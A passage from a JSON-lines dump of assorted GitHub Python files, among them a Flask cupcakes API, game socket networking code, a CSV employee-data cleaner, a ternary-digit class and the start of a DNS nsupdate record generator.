pair[1])\n\t\t\t\n\t\t\t#keep only the values (drop the counts) of the least common categoricals\n\t\t\tleastCommonCategoricals[col] = [pair[0] for pair in columnHist.take(max(0, columnHist.count() - MAX_UNIQUE_CATEGORICAL_FEATURES + 2))]\n\t\t\n\t\tnoneHash = MAX_UNIQUE_CATEGORICAL_FEATURES - 1 #reserved hash for missing categorical features\n\t\tinfrequentHash = noneHash - 1 #reserved hash for infrequent categorical values\n\n\t\t#performs the hashing operation on each categorical feature\n\t\tdef hash(value, leastCommonCategoricalsCol):\n\t\t\tif value == None:\n\t\t\t\treturn noneHash\n\t\t\telif value in leastCommonCategoricalsCol:\n\t\t\t\treturn 
infrequentHash\n\t\t\telse:\n\t\t\t\treturn int(hashlib.sha1(value).hexdigest(), 16) % (MAX_UNIQUE_CATEGORICAL_FEATURES - 2)\n\n\t\tself.mapOnColumnsWithParam(hash, leastCommonCategoricals, self.categoricalColumns)\n\t\t\n\tdef preprocess(self):\n\t\tself.normaliseInts()\n\t\tself.hashCategoricalsToInts()\n\t\tself.preprocessed = True\n\n\t\n\t\t\n\t\n\t","repo_name":"timchap92/SparkFfm","sub_path":"src/mixeddata.py","file_name":"mixeddata.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"74297392248","text":"from trit import *\n\nclass trigit:\n alphabet = ['n','o','p','q','r','s','t','u','v','w','x','y','z','_',\n 'a','b','c','d','e','f','g','h','i','j','k','l','m']\n\n def __init__(self,s):\n if type(s) == list and len(s) == 3 and all(isinstance(item,trit) for item in s):\n self.list = s\n elif type(s) == int and s >= -13 and s <= 13:\n self.fromInt(s)\n elif type(s) == str:\n if s in trigit.alphabet:\n self.fromChar(s)\n elif len(s) == 3:\n self.list = [trit(c) for c in s]\n else:\n raise TypeError('Invalid constructor input')\n else:\n raise TypeError('Invalid constructor input')\n\n def fromInt(self,n):\n n = n + 13\n self.list = [trit(n//9-1),trit(n//3%3-1),trit(n%3-1)]\n\n def fromChar(self,c):\n n = trigit.alphabet.index(c) - 13\n self.fromInt(n)\n\n def __str__(self,prefix=trinary_prefix):\n return prefix + trigit.alphabet[((self.list[0].d+1) * 9) + ((self.list[1].d+1) * 3) + (self.list[2].d+1)]\n\n def __repr__(self):\n return \"trigit('%s')\" % self.__str__('')\n\n def __eq__(self,other):\n try:\n assert(not isinstance(other,trigit))\n raise TypeError('Invalid arguments for __eq__: trigit and %s' % str(type(other).__name__))\n except AssertionError:\n return all(self.list[i] == other.list[i] for i in range(3))\n\n def __int__(self):\n return ((self.list[0].d) * 9) + ((self.list[1].d) * 3) + (self.list[2].d)\n\n def __add__(self, other):\n try:\n assert(not isinstance(other,trigit))\n raise TypeError('Invalid arguments for __add__: trigit and %s' % str(type(other).__name__))\n except AssertionError:\n out = []\n carry = trit(0)\n for i in range(2,-1,-1):\n add = self.list[i] + other.list[i]\n overflow = self.list[i].overflow(other.list[i])\n out.insert(0,carry + add)\n carry = overflow + carry.overflow(add)\n return trigit(out)\n\n def overflow(self, other):\n out = []\n carry = trit(0)\n for i in range(2,-1,-1):\n add = self.list[i] + other.list[i]\n overflow = self.list[i].overflow(other.list[i])\n out.insert(0,carry + add)\n carry = overflow + carry.overflow(add)\n return trigit([trit(0),trit(0),carry])\n\n def trits(self):\n return ''.join(str(trit) for trit in self.list)\n","repo_name":"cstuartroe/trinary_computer","sub_path":"trigit.py","file_name":"trigit.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10155136639","text":"\"\"\"Flask app for Cupcakes\"\"\"\nfrom flask import Flask, request, jsonify, render_template, redirect, flash, session\nfrom flask_debugtoolbar import DebugToolbarExtension \nfrom flask_sqlalchemy import SQLAlchemy \nfrom models import db, connect_db, Cupcake\nimport os\n\napp = Flask(__name__) \n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql:///cupcakes_db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False \napp.config['SQLALCHEMY_ECHO'] = True\napp.config['SECRET_KEY'] = os.environ.get(\"SECRET_KEY\", 
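# A digits-only check of the balanced-ternary encoding used by trigit above:
# three trits in {-1, 0, 1} encode the integers -13..13 via n = 9a + 3b + c.
def to_trits(n):
    assert -13 <= n <= 13
    m = n + 13
    return (m // 9 - 1, m // 3 % 3 - 1, m % 3 - 1)

def from_trits(trits):
    a, b, c = trits
    return 9 * a + 3 * b + c

assert all(from_trits(to_trits(n)) == n for n in range(-13, 14))
print(to_trits(-13), to_trits(0), to_trits(13))  # (-1, -1, -1) (0, 0, 0) (1, 1, 1)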
'bUFEHUWEF900')\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False \ndebug = DebugToolbarExtension(app)\n\nconnect_db(app) \ndb.create_all() \n\n@app.route('/') \ndef index_page(): \n \"\"\"GET /\n This should return an HTML page (via render_template). \n This page should be entirely static (the route should just render the template, without providing any information on cupcakes in the database).\n It should simply have an empty list where cupcakes should appear and a form where new cupcakes can be added.\n\n Write Javascript (using axios and jQuery) that:\n queries the API to get the cupcakes and adds to the page\n handles form submission to both let the API know about the new cupcake and updates the list on the page to show it\n \"\"\"\n return render_template('index.html') \n \n@app.route('/api/cupcakes')\ndef all_cupcakes():\n \"\"\"GET /api/cupcakes\n Get data about all cupcakes.\n\n Respond with JSON like: {cupcakes: [{id, flavor, size, rating, image}, ...]}.\n\n The values should come from each cupcake instance.\n \"\"\"\n\n all_cupcakes = [cupcake.serialize() for cupcake in Cupcake.query.all()]\n return jsonify(cupcakes=all_cupcakes)\n\n@app.route('/api/cupcakes/<int:id>')\ndef get_cupcake(id):\n \"\"\"GET /api/cupcakes/[cupcake-id]\n Get data about a single cupcake.\n\n Respond with JSON like: {cupcake: {id, flavor, size, rating, image}}.\n\n This should raise a 404 if the cupcake cannot be found.\n \"\"\"\n cupcake = Cupcake.query.get_or_404(id) \n return jsonify(cupcake=cupcake.serialize())\n\n@app.route('/api/cupcakes', methods=[\"POST\"])\ndef create_cupcake():\n \"\"\"POST /api/cupcakes\n Create a cupcake with flavor, size, rating and image data from the body of the request.\n\n Respond with JSON like: {cupcake: {id, flavor, size, rating, image}}.\n \"\"\"\n # print(request.json)\n new_cupcake = Cupcake(flavor=request.json[\"flavor\"], size=request.json[\"size\"], rating=request.json[\"rating\"], image=request.json[\"image\"])\n db.session.add(new_cupcake)\n db.session.commit()\n response_json = jsonify(cupcake=new_cupcake.serialize())\n return (response_json, 201)\n\n@app.route('/api/cupcakes/<int:id>', methods=[\"PATCH\"])\ndef update_cupcake(id):\n \"\"\"PATCH /api/cupcakes/[cupcake-id]\n Update a cupcake with the id passed in the URL and flavor, size, rating and image data from the body of the request. \n You can always assume that the entire cupcake object will be passed to the backend.\n\n This should raise a 404 if the cupcake cannot be found.\n\n Respond with JSON of the newly-updated cupcake, like this: {cupcake: {id, flavor, size, rating, image}}.\n \"\"\"\n data = request.json\n cupcake = Cupcake.query.get_or_404(id) \n cupcake.flavor = data['flavor']\n cupcake.size = data['size']\n cupcake.rating = data['rating']\n cupcake.image = data['image']\n\n db.session.add(cupcake)\n db.session.commit() \n\n return jsonify(cupcake=cupcake.serialize())\n\n@app.route('/api/cupcakes/<int:id>', methods=[\"DELETE\"])\ndef delete_cupcake(id):\n \"\"\"DELETE /api/cupcakes/[cupcake-id]\n This should raise a 404 if the cupcake cannot be found.\n\n Delete cupcake with the id passed in the URL. 
Respond with JSON like {message: \"Deleted\"}.\n \"\"\"\n cupcake = Cupcake.query.get_or_404(id) \n db.session.delete(cupcake) \n db.session.commit() \n return jsonify(message=\"Deleted\")\n\n\n\n\n\n","repo_name":"pasha-log/flask-cupcakes","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74458127607","text":"import logging\nimport socket\nimport select\nimport struct\nimport zlib\n\nfrom mm.common.events import (serialize_event_to_string,\n serialize_event_from_string,\n ClientConnectedEvent,\n ClientDisconnectedEvent,\n ClientEvent)\n\nLOG = logging.getLogger(__name__)\n\nDEFAULT_NETWORK_PORT = 8888\nCOMPRESSION_LEVEL = 1\n\n\ndef compress_data(data):\n return zlib.compress(data, COMPRESSION_LEVEL)\n\n\ndef decompress_data(data):\n return zlib.decompress(data)\n\n\nclass WriteBuffer(object):\n def __init__(self, max_size=None):\n self.buffer = bytearray()\n self.max_size = max_size\n\n def get_buffer_data(self):\n return self.buffer\n\n def get_buffer_size(self):\n return len(self.buffer)\n\n def is_empty(self):\n return len(self.buffer) == 0\n\n def can_write(self, length=1):\n if self.max_size is None:\n return True\n else:\n return len(self.buffer) + length <= self.max_size\n\n def skip(self, length):\n if len(self.buffer) >= length:\n self.buffer = self.buffer[length:]\n else:\n raise RuntimeError(\n 'Not enough data in buffer to skip %d bytes' % (length,))\n\n def _write(self, data):\n if self.can_write(len(data)):\n self.buffer += data\n return True\n else:\n return False\n\n def write_bytes(self, data):\n return (self.can_write(2 + len(data)) and\n self.write_uint16(len(data)) and\n self._write(data))\n\n def write_string(self, string):\n return self.write_bytes(string.encode('utf-8'))\n\n def write_int16(self, data):\n return self.can_write(2) and self._write(struct.pack('!h', data))\n\n def write_uint16(self, data):\n return self.can_write(2) and self._write(struct.pack('!H', data))\n\n def write_int32(self, data):\n return self.can_write(4) and self._write(struct.pack('!i', data))\n\n def write_uint32(self, data):\n return self.can_write(4) and self._write(struct.pack('!I', data))\n\n def write_float(self, data):\n return self.can_write(4) and self._write(struct.pack('!f', data))\n\n\nclass ReadBuffer(object):\n def __init__(self, buf=None):\n if buf:\n self.buffer = buf\n else:\n self.buffer = bytearray()\n\n def get_buffer_data(self):\n return self.buffer\n\n def get_buffer_size(self):\n return len(self.buffer)\n\n def feed(self, data):\n self.buffer += data\n\n def peek(self, length):\n if self.can_read(length):\n return self.buffer[:length]\n else:\n return None\n\n def can_read(self, length=1):\n return len(self.buffer) >= length\n\n def skip(self, length):\n if self.can_read(length):\n self.buffer = self.buffer[length:]\n\n def _read(self, length):\n if len(self.buffer) >= length:\n data = self.buffer[:length]\n self.buffer = self.buffer[length:]\n return data\n else:\n return None\n\n def read_bytes(self):\n length = struct.unpack('!H', self.peek(2))[0]\n if self.can_read(2 + length):\n self.skip(2)\n return self._read(length)\n else:\n return None\n\n def read_string(self):\n return self.read_bytes().decode('utf-8')\n\n def read_int16(self):\n data = self._read(2)\n if data:\n data = struct.unpack('!h', data)[0]\n return data\n\n def read_uint16(self):\n data = self._read(2)\n if data:\n data = struct.unpack('!H', data)[0]\n 
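# The wire format used by WriteBuffer/ReadBuffer above, shown with bare struct
# calls: everything is big-endian ('!'), and byte strings travel with a uint16
# length prefix. The payload is an arbitrary example.
import struct

payload = b'hello'
frame = struct.pack('!H', len(payload)) + payload   # what write_bytes emits
(length,) = struct.unpack('!H', frame[:2])          # what read_bytes peeks
assert frame[2:2 + length] == payload
print(length, frame)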
return data\n\n def read_int32(self):\n data = self._read(4)\n if data:\n data = struct.unpack('!i', data)[0]\n return data\n\n def read_uint32(self):\n data = self._read(4)\n if data:\n data = struct.unpack('!I', data)[0]\n return data\n\n\nclass Channel(object):\n MAX_MESSAGE_SIZE = 8192\n MAX_RECEIVE_SIZE = 8192\n\n def __init__(self, sock):\n self.sock = sock\n\n # in- and outbound buffers\n self.write_buffer = WriteBuffer()\n self.read_buffer = ReadBuffer()\n\n # keep track of last sent message id\n self.send_message_id = 1\n\n # keep track of last received message id\n self.recv_message_id = None\n\n # in- and outbound event queues\n self.in_events = []\n self.out_events = []\n\n def synchronize(self):\n return self.send_data() and self.receive_data()\n\n def receive_data(self):\n try:\n # check if there's anything on the socket\n readable, _, _ = select.select([self.sock], [], [], 0)\n if readable:\n # read data!\n data = self.sock.recv(self.MAX_RECEIVE_SIZE)\n\n if not data:\n # client disconnected\n return False\n\n # handle received data\n self.read_buffer.feed(data)\n self.on_data_received()\n\n return True\n except socket.error:\n LOG.exception('Socket error')\n return False\n\n def send_message(self, message_data):\n compressed_message_data = compress_data(message_data)\n\n #LOG.debug(\n # 'Compression %d -> %d bytes, compression factor %f',\n # len(message_data), len(compressed_message_data),\n # float(len(compressed_message_data)) / len(message_data))\n\n self.write_buffer.write_int32(self.send_message_id)\n self.write_buffer.write_bytes(compressed_message_data)\n\n self.send_message_id += 1\n\n def send_all_events(self):\n message_writer = WriteBuffer(self.MAX_MESSAGE_SIZE)\n\n for event in self.out_events:\n # serialize event to string\n serialized_event = serialize_event_to_string(event)\n\n if not message_writer.write_bytes(serialized_event):\n if len(serialized_event) > self.MAX_MESSAGE_SIZE:\n\n # TODO(fpj):\n # This will crash the game when there are a lot of entities\n # in the world. 
I haven't checked but it's probably the\n # DeltaStateEvent that becomes too large if there are a lot\n # of actors in it.\n\n # event will never fit in a message\n raise RuntimeError(\n 'Event size %d too big' % (len(serialized_event),))\n else:\n # send message and continue with the next\n self.send_message(message_writer.get_buffer_data())\n message_writer = WriteBuffer(self.MAX_MESSAGE_SIZE)\n if not message_writer.write_bytes(serialized_event):\n raise RuntimeError('Failed to write event')\n\n # send remaining data\n if not message_writer.is_empty():\n self.send_message(message_writer.get_buffer_data())\n\n # no outbound events left\n self.out_events = []\n\n def send_data(self):\n try:\n # serialize and send all outbound events\n if self.out_events:\n self.send_all_events()\n\n # check if we have anything to send, and try to send it\n if not self.write_buffer.is_empty():\n # check if the socket is writable\n _, writable, _ = select.select([], [self.sock], [], 0)\n if writable:\n # send data!\n bytes_sent = self.sock.send(\n self.write_buffer.get_buffer_data())\n\n if bytes_sent == 0:\n # something went wrong\n return False\n\n self.write_buffer.skip(bytes_sent)\n\n return True\n except socket.error:\n LOG.exception('Socket error')\n return False\n\n def on_data_received(self):\n # read message id\n if not self.recv_message_id:\n message_id = self.read_buffer.read_int32()\n if message_id:\n if (self.recv_message_id and\n self.recv_message_id != (message_id - 1)):\n raise RuntimeError(\n 'Out of sync %d + 1 != %d' %\n (self.recv_message_id, message_id))\n self.recv_message_id = message_id\n\n # read message data\n if self.recv_message_id:\n message_data = self.read_buffer.read_bytes()\n if message_data:\n self.on_message_received(decompress_data(message_data))\n\n def on_message_received(self, message_data):\n event_reader = ReadBuffer(message_data)\n while event_reader.can_read():\n serialized_event = event_reader.read_bytes()\n if serialized_event:\n self.in_events.append(\n serialize_event_from_string(serialized_event))\n else:\n # no more events\n break\n\n if event_reader.can_read():\n LOG.warning(\n '%d bytes of unparsed message data' %\n (event_reader.get_buffer_size(),))\n\n # ready for next message\n self.recv_message_id = None\n\n def send_event(self, event):\n self.out_events.append(event)\n\n def receive_events(self):\n for event in self.in_events:\n yield event\n\n # clear inbound queue\n self.in_events = []\n\n\nclass Client(object):\n def __init__(self, event_distributor):\n self.event_distributor = event_distributor\n self.server_socket = None\n self.channel = None\n\n def is_connected(self):\n return self.server_socket\n\n def connect(self, address, port):\n if self.is_connected():\n self.disconnect()\n\n LOG.info('Connecting to server %s:%d', address, port)\n self.server_socket = socket.create_connection((address, port))\n if self.server_socket:\n self.channel = Channel(self.server_socket)\n return True\n else:\n LOG.info('Failed to connect to server %s:%d', address, port)\n return False\n\n def disconnect(self):\n if self.is_connected():\n LOG.info('Disconnecting from server')\n self.server_socket.close()\n self.server_socket = None\n self.channel = None\n\n def send_event(self, event):\n if self.is_connected():\n self.channel.send_event(event)\n\n def read_from_server(self):\n if self.is_connected():\n if self.channel.receive_data():\n for event in self.channel.receive_events():\n self.event_distributor.post(event)\n else:\n LOG.info('Server closed the 
connection')\n self.disconnect()\n self.event_distributor.post(ClientDisconnectedEvent(0))\n\n def write_to_server(self):\n if self.is_connected():\n if not self.channel.send_data():\n LOG.info('Broken socket, disconnecting')\n self.disconnect()\n self.event_distributor.post(ClientDisconnectedEvent(0))\n\n\nclass Server(object):\n def __init__(self, event_distributor, port):\n self.event_distributor = event_distributor\n self.port = port\n self.server_socket = None\n self.client_sockets = []\n self.channels = {}\n\n def start_server(self):\n self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.server_socket.bind(('', self.port))\n self.server_socket.listen(10)\n\n def stop_server(self):\n if self.server_socket:\n self.server_socket.close()\n self.server_socket = None\n\n def accept_pending_clients(self):\n readable, _, _ = select.select([self.server_socket], [], [], 0)\n if readable:\n client_socket, address = self.server_socket.accept()\n self.client_sockets.append(client_socket)\n client_id = client_socket.fileno()\n self.channels[client_id] = Channel(client_socket)\n self.event_distributor.post(ClientConnectedEvent(client_id))\n LOG.info('Client %d connected', client_id)\n\n def broadcast_event(self, event):\n for channel in self.channels.values():\n channel.send_event(event)\n\n def send_event(self, client_id, event):\n self.channels[client_id].send_event(event)\n\n def read_from_clients(self):\n if not self.client_sockets:\n return\n readable, _, _ = select.select(self.client_sockets, [], [], 0)\n for sock in readable:\n client_id = sock.fileno()\n channel = self.channels[client_id]\n if channel.receive_data():\n for event in channel.receive_events():\n self.event_distributor.post(ClientEvent(client_id, event))\n else:\n LOG.info('Client %d disconnected', client_id)\n self.client_sockets.remove(sock)\n del self.channels[client_id]\n self.event_distributor.post(\n ClientDisconnectedEvent(client_id))\n\n def write_to_clients(self):\n if not self.client_sockets:\n return\n _, writable, _ = select.select([], self.client_sockets, [], 0)\n for sock in writable:\n client_id = sock.fileno()\n if not self.channels[client_id].send_data():\n LOG.info('Broken socket to client %d, disconnecting', client_id)\n self.client_sockets.remove(sock)\n del self.channels[client_id]\n self.event_distributor.post(\n ClientDisconnectedEvent(client_id))\n","repo_name":"fryingpanjoe/mmo-manager","sub_path":"mm/common/networking.py","file_name":"networking.py","file_ext":"py","file_size_in_byte":13931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7924884606","text":"# import directories\nimport os\nimport csv\n\n# path to data file\nemp_csv = os.path.join(\"Resources\", \"employee_data.csv\")\n\n# Lists to store data\nempID = []\nfirstName = []\nlastName = []\ndob = []\nssn = []\nstate = []\n\n# dictionary from : https://gist.github.com/afhaque/29f0f4f37463c447770517a6c17d08f5\nstatesABBV = {\n 'Alabama': 'AL',\n 'Alaska': 'AK',\n 'Arizona': 'AZ',\n 'Arkansas': 'AR',\n 'California': 'CA',\n 'Colorado': 'CO',\n 'Connecticut': 'CT',\n 'Delaware': 'DE',\n 'Florida': 'FL',\n 'Georgia': 'GA',\n 'Hawaii': 'HI',\n 'Idaho': 'ID',\n 'Illinois': 'IL',\n 'Indiana': 'IN',\n 'Iowa': 'IA',\n 'Kansas': 'KS',\n 'Kentucky': 'KY',\n 'Louisiana': 'LA',\n 'Maine': 'ME',\n 'Maryland': 'MD',\n 'Massachusetts': 'MA',\n 'Michigan': 'MI',\n 'Minnesota': 'MN',\n 'Mississippi': 
'MS',\n 'Missouri': 'MO',\n 'Montana': 'MT',\n 'Nebraska': 'NE',\n 'Nevada': 'NV',\n 'New Hampshire': 'NH',\n 'New Jersey': 'NJ',\n 'New Mexico': 'NM',\n 'New York': 'NY',\n 'North Carolina': 'NC',\n 'North Dakota': 'ND',\n 'Ohio': 'OH',\n 'Oklahoma': 'OK',\n 'Oregon': 'OR',\n 'Pennsylvania': 'PA',\n 'Rhode Island': 'RI',\n 'South Carolina': 'SC',\n 'South Dakota': 'SD',\n 'Tennessee': 'TN',\n 'Texas': 'TX',\n 'Utah': 'UT',\n 'Vermont': 'VT',\n 'Virginia': 'VA',\n 'Washington': 'WA',\n 'West Virginia': 'WV',\n 'Wisconsin': 'WI',\n 'Wyoming': 'WY',\n}\n\n# with open(udemy_csv, encoding='utf-8') as csvfile:\nwith open(emp_csv) as fileHeader:\n csvReader = csv.reader(fileHeader, delimiter=\",\")\n\n csvHeader = next(csvReader)\n\n for row in csvReader:\n\n # read employee id\n empID.append(row[0])\n\n # read name find index for space\n space = row[1].find(' ')\n \n # store first name\n firstName.append(row[1][0:space])\n\n # store last name\n lastName.append(row[1][space+1:])\n\n # reformat DOB\n month = row[2][5:7]\n day = row[2][-2:]\n year = row[2][0:4]\n date = month + '/' + day + '/' + year\n\n # store DOB\n dob.append(date)\n\n # ssn reformat\n newSSN = '***-**-' + row[3][-4:]\n\n # store SSN\n ssn.append(newSSN)\n\n # use dictionary to convert state to abbrv\n state.append(statesABBV[row[4]])\n\n# combine strings\ncleaned_empData = zip(empID, firstName, lastName, dob, ssn, state)\n\n# set output file path\noutput = os.path.join(\"analysis\", \"cleanedEmpData.csv\")\n\n# open output file\nwith open(output, \"w\") as outputHeader:\n writer = csv.writer(outputHeader)\n\n # write the header row\n writer.writerow([\"Emp ID\", \"First Name\", \"Last Name\", \"DOB\", \"SSN\", \"State\"])\n\n # write zipped rows\n writer.writerows(cleaned_empData)","repo_name":"mscheme/python-challenge","sub_path":"PyBoss/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15090089655","text":"import random, math\r\nfrom Cat import Cat\r\n\r\nclass LazyCat(Cat):\r\n def __init__(self, coordinates, n):\r\n super().__init__(coordinates, n)\r\n self.n = 0\r\n self.probability = 1/(1+math.exp(-0.1*n))\r\n self.laziness = random.uniform(0, 1)\r\n\r\n def mouseInteraction(self, mouse):\r\n distance = math.sqrt((self.x - mouse.x)**2 + (self.y - mouse.y)**2)\r\n if distance < 4:\r\n if self.probability > self.laziness:\r\n self.n += 1\r\n mouse.x = mouse.x0\r\n mouse.y = mouse.y0\r\n\r\n def move(self):\r\n self.step = random.randint(-10, 10)","repo_name":"Yaskeir/Python","sub_path":"CatSim/1.0/LazyCat.py","file_name":"LazyCat.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9025508915","text":"import math\nt=int(input())\nfor i in range(t):\n n,a,b,k=list(map(int,input().strip().split(' ')))\n c=0\n if(a==b):\n print('Lose')\n else: \n n1=n+1\n arr=[False]*n1\n for i in range(a,n1,a):\n arr[i]=not(arr[i])\n for j in range(b,n1,b):\n arr[j]=not(arr[j])\n c=arr.count(True)\n if(c>=k):\n print('Win')\n else:\n print('Lose')\n \n","repo_name":"kaustubhdeokar/CompetitiveCoding","sub_path":"1/CodeChef/FebLong/do.py","file_name":"do.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"16986184582","text":"from __future__ import absolute_import\nfrom distutils.core import setup\n\nimport 
os.path\n\nrequirements_filename = os.path.join(\n os.path.dirname(os.path.abspath(__file__)), 'requirements.txt')\n\nwith open(requirements_filename) as fd:\n install_requires = [i.strip() for i in fd.readlines()]\n\nsetup(\n name='duo_client',\n version='3.0',\n description='Reference client for Duo Security APIs',\n author='Duo Security, Inc.',\n author_email='support@duosecurity.com',\n url='https://github.com/duosecurity/duo_client_python',\n packages=['duo_client'],\n package_data={'duo_client': ['ca_certs.pem']},\n license='BSD',\n classifiers=[\n 'Programming Language :: Python',\n 'License :: OSI Approved :: BSD License',\n ],\n install_requires=install_requires,\n)\n","repo_name":"amir17688/google_data_p2","sub_path":"51652_setup.py_C__Users_user_Desktop_data_2_data_google_data_duosecurity_duo_client_python.py","file_name":"51652_setup.py_C__Users_user_Desktop_data_2_data_google_data_duosecurity_duo_client_python.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6773648044","text":"from netCDF4 import Dataset\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef create_output_file(path):\n f = Dataset(path, \"w\", clobber = True)\n f.createDimension(\"swaths\", size = None)\n f.createDimension(\"scenes\", size = None)\n f.createDimension(\"swath_width\", size = 221)\n f.createDimension(\"date_string\", size = 14)\n f.createDimension(\"x_size\", size = 1900)\n f.createDimension(\"y_size\", size = 2200)\n\n f.createVariable(\"scene_id\", \"i8\", (\"scenes\"))\n f.createVariable(\"start_time\", \"c\", (\"swaths\", \"date_string\"))\n f.createVariable(\"end_time\", \"c\", (\"swaths\", \"date_string\"))\n\n # Location\n f.createVariable(\"lon\", \"f4\", (\"swaths\", \"swath_width\"))\n f.createVariable(\"lat\", \"f4\", (\"swaths\", \"swath_width\"))\n\n # GPROF\n g = f.createGroup(\"gprof\")\n g.createVariable(\"tcwv_index\", \"i4\", (\"swaths\", \"swath_width\"))\n g.createVariable(\"t2m_index\", \"i4\", (\"swaths\", \"swath_width\"))\n g.createVariable(\"st_index\", \"i4\", (\"swaths\", \"swath_width\"))\n g.createVariable(\"surface_precipitation\", \"f4\", (\"swaths\", \"swath_width\"))\n\n\n # 1c\n g = f.createGroup(\"1c\")\n g.createDimension(\"channels\", size = 13)\n g.createVariable(\"brightness_temperatures\", \"f4\", (\"swaths\", \"swath_width\", \"channels\"))\n\n # Opera\n g = f.createGroup(\"opera\")\n g.createVariable(\"precipitation_5\", \"f4\", (\"swaths\", \"swath_width\",))\n g.createVariable(\"precipitation_10\", \"f4\", (\"swaths\", \"swath_width\",))\n\n # Combined\n g = f.createGroup(\"combined\")\n g.createDimension(\"swaths_combined\", None)\n g.createDimension(\"swath_width_combined\", 49)\n g.createVariable(\"scene_id\", \"i4\", (\"swaths_combined\",))\n g.createVariable(\"lat\", \"f4\", (\"swaths_combined\", \"swath_width_combined\"))\n g.createVariable(\"lon\", \"f4\", (\"swaths_combined\", \"swath_width_combined\"))\n g.createVariable(\"surface_precipitation\", \"f4\", (\"swaths_combined\", \"swath_width_combined\"))\n\n return f\n\n","repo_name":"simonpf/gpm_article","sub_path":"scripts/colocations.py","file_name":"colocations.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19305728587","text":"#!/usr/bin/python\n#-*- coding: utf-8 -*-\nimport logging\nimport json\nimport os\n\nclass LoadFile:\n def __init__(self):\n self.logger 
= logging.getLogger(\"chobomemo\")\n\n def loadfile(self, filename):\n memoList = {}\n try:\n if os.path.isfile(filename):\n with open(filename) as f:\n jsonData = json.load(f)\n memoList = {}\n idx = 0\n for memo in jsonData[\"data\"]:\n idx += 1\n item = {}\n item['id'] = memo[\"id\"]\n item['memo'] = memo[\"memo\"]\n item['index'] = str(idx)\n memoList[item['index']] = item\n self.logger.info(\"Success to load \" + filename)\n return memoList\n except:\n self.logger.exception(\"Loading failed:\" + filename)\n\n return {}\n\n\ndef test():\n \"\"\"For unittest\"\"\"\n fm = LoadFile()\n assert fm.loadfile(\"\") == {}\n fm.loadfile(\"v1_test05.cfm\")\n\n\n","repo_name":"chobocho/ChoboMemo2","sub_path":"src/store/loadfilev1.py","file_name":"loadfilev1.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72764295929","text":"# This script will read from SLS and external DNS all records on the CAN network and compute forward and reverse\n# commands in the format that nsupdate expects. It will check to make sure that all addresses fit inside the main CAN\n# subnet as well ensuring that only those records that can be resolved externally are created.\n#\n# To run it requires 3 things:\n# 1) The FQDN of the server to send the update to.\n# 2) A TOKEN environment variable exported for authentication with the API gateway.\n# 3) A kubeconfig that can be read by the Kubernetes Python API.\n#\n# By default when it is run it will output a file in the current directory that contains all the commands necessary\n# to update the forward and reverse zones for the CAN addresses.\n\nimport base64\nimport random\nimport json\nimport ast\nimport os\nimport requests\nimport urllib3\nimport argparse\nimport ipaddress\nfrom kubernetes import config, client\nfrom kubernetes.stream import stream\nimport yaml\n\nTTL = 86400\n\n\ndef format_nsupdate_record(name, host, type):\n return \"update add {} {} {} {}\".format(name, TTL, type, host)\n\n\ndef add_host(fqdn, ipaddress):\n # Check first to make sure this IP address fits into the supernet.\n if ipaddress not in supernet:\n return\n\n forward_record = \"{}\".format(format_nsupdate_record(fqdn, ipaddress, \"A\"))\n forward_records.append(forward_record)\n\n arpa_host = ipaddress.reverse_pointer\n reverse_record = \"{}\".format(format_nsupdate_record(arpa_host, fqdn, \"PTR\"))\n reverse_records.append(reverse_record)\n\n\nparser = argparse.ArgumentParser(description='Utility to build nsupdate compatible external DNS records.')\nparser.add_argument('--dns_server', type=str, action=\"store\", required=True,\n help='FQDN of the DNS server to nsupdate to.')\nparser.add_argument('--server_port', type=int, action=\"store\", default=53,\n help='Port of the DNS server.')\nparser.add_argument('--output_file', type=str, action=\"store\", default=\"./nsupdate-commands.txt\",\n help=\"File to output nsupdate commands to.\")\n\nparser.add_argument('--base_api_address', type=str, action=\"store\", default=\"http://cray-sls\",\n help=\"Base address for API gateway.\")\n\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nargs = parser.parse_args()\n\nNAMESPACE = \"services\"\n\ntoken = None\ntry:\n config.load_incluster_config()\nexcept config.ConfigException:\n try:\n config.load_kube_config()\n\n # If we're running outside the cluster we need to have an exported TOKEN.\n token = os.environ.get('TOKEN')\n if token is None:\n print(\"TOKEN can not be 
